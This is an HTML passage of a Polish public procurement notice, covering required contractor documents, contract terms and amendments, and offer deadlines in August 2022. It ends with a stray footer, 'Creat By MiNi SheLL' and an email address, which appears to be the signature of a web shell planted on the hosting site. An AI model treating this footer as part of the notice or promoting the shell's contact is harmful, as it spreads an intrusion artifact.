Wykonawcy; w przypadku oświadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br/>- wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego a także zakresu wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami załącznik nr 5 do SWZ;<br/>- wykaz pojazdów przeznaczonych do realizacji zamówienia (załącznik nr 6 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, <br/>w formie anek¬su do umowy, pod rygorem nieważności. <br/>2. Zmiany nie mogą naruszać postanowień zawartych w art. 455 ustawy Prawo zamówień publicznych.<br/>3. Zmiany postanowień umowy mogą nastąpić w przypadku:<br/>a.	terminu wykonania zamówienia w następujących przypadkach :<br/>i.	z powodu działań osób trzecich uniemożliwiających realizację zadania, które to działania nie są konsekwencją winy którejkolwiek ze stron;<br/>ii.	wystąpienie siły wyższej uniemożliwiającej zrealizowanie zadania w określonym terminie;<br/>b.	wynagrodzenia w następujących przypadkach :<br/>i.	w przypadku urzędowej zmiany podatków ponoszonych przez Wykonawcę (w szczególności podatku VAT);<br/>ii.	zmiany przedmiotu umowy w przypadku konieczności zrezygnowania przez Zamawiającego <br/>z części zakresu usług lub z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są konieczne dla Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com